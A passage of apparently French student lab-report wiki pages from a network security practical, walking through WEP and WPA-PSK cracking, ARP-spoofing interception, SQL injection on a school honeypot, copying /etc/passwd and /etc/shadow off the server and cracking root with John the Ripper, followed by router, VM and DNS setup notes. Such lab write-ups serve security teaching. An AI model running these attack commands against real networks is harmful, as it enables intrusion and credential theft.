Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54042</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54042"/>
				<updated>2020-11-30T13:48:18Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible sur demande en contactant un membre du binôme.&lt;br /&gt;
&lt;br /&gt;
===Verifications===&lt;br /&gt;
https://www.trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
